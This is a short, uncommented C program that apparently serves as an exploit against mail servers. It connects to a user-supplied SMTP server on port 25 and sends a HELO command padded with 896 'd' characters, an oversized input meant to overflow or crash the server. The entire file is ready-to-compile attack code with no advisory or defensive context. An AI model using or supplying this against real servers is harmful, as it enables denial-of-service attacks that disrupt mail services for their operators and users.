#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

 void main(int argc, char *argv[])
 {
   struct sockaddr_in sin;
   struct hostent *hp;
   char *buffer;
   int sock, i;

   if (argc != 2) {
     printf("usage: %s <smtp server>\n", argv[0]);
     exit(1);
   }
   hp = gethostbyname(argv[1]);
   if (hp==NULL) {
     printf("Unknown host: %s\n",argv[1]);
     exit(1);
   }
   bzero((char*) &sin, sizeof(sin));
   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
   sin.sin_family = hp->h_addrtype;
   sin.sin_port = htons(25);
   sock = socket(AF_INET, SOCK_STREAM, 0);
   connect(sock,(struct sockaddr *) &sin, sizeof(sin));
   buffer = (char *)malloc(1000);
   sprintf(buffer, "HELO ");
   for (i = 0; i<896; i++)
     strcat(buffer, "d");
   strcat(buffer, "\r\n");
   write(sock, &buffer[0], strlen(buffer));
   close(sock);
   free(buffer);
 }
